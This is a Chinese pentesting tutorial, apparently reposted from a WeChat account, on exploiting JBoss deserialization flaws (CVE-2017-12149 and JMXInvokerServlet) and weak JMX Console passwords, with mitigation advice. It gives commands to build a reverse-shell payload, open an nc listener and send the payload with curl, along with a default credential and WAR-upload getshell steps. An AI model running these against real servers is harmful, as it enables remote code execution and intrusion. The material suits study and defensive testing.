前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >中间件渗透测试之JBoss

中间件渗透测试之JBoss

作者头像
HACK学习
发布2019-08-06 11:10:58
1.4K0
发布2019-08-06 11:10:58
举报
文章被收录于专栏:HACK学习HACK学习

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

参考:

https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg

https://access.redhat.com/security/cve/cve-2017-12149

漏洞复现

首先检测目录,访问链接(http://192.168.204.128:8080/invoker/readonly)

可以看到是返回 500,一般漏洞就是存在了

工具下载地址 http://scan.javasec.cn/java/JavaDeserH2HC.zip

代码语言:javascript
复制
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //生成一个ReverseShellCommonsCollectionsHashMap.ser二进制文件nc -lvnp 2333curl http://192.168.204.128:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

漏洞建议

建议用户升级到JBOSS AS7。另,不能及时升级的用户,可采取如下临时解决方案:

1.不需要 http-invoker.sar 组件的用户可直接删除此组件

2.添加如下代码至 http-invoker.sar 下 web.xml 的 security-constraint 标签中:/*用于对 http invoker 组件进行访问控制

JBoss JMXInvokerServlet 反序列化漏洞

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

参考文档:

https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

https://www.seebug.org/vuldb/ssvid-89723

http://www.freebuf.com/sectool/88908.html

https://paper.seebug.org/312/

漏洞复现

JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象,整个过程可参考 jboss/CVE-2017-12149,不再赘述

网上已经有很多EXP了,比如DeserializeExploit.jar,直接用该工具执行命令、上传文件即可:

弱口令 getshell过程  

代码语言:javascript
复制
admin:admin

以下引用Nmask:   访问管理页面,查看jboss配置页面中的JMX Console,这是JBoss的管理台程序,进入后找到Jboss.deployment包,该包下有flavor=URL.type=DeploymentSccanner选项。进入部署页面后便可以上传war文件,但与tomcat不同的是它不是本地上传war文件,而是从远程地址下载,因此需要自己准备一个文件服务器,用于远程下载war到目标jboss服务器上。具体方法是在部署页面找到”ADDURL”方法,输入URL地址,点击invoke。除了以上方法外,JMX-Console提供的BSH方法,同样也可以部署war包

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-12-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
    • 漏洞复现
      • 漏洞建议
      • JBoss JMXInvokerServlet 反序列化漏洞
        • 漏洞复现
        • 弱口令 getshell过程  
        相关产品与服务
        文件存储
        文件存储(Cloud File Storage,CFS)为您提供安全可靠、可扩展的共享文件存储服务。文件存储可与腾讯云服务器、容器服务、批量计算等服务搭配使用,为多个计算节点提供容量和性能可弹性扩展的高性能共享存储。腾讯云文件存储的管理界面简单、易使用,可实现对现有应用的无缝集成;按实际用量付费,为您节约成本,简化 IT 运维工作。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档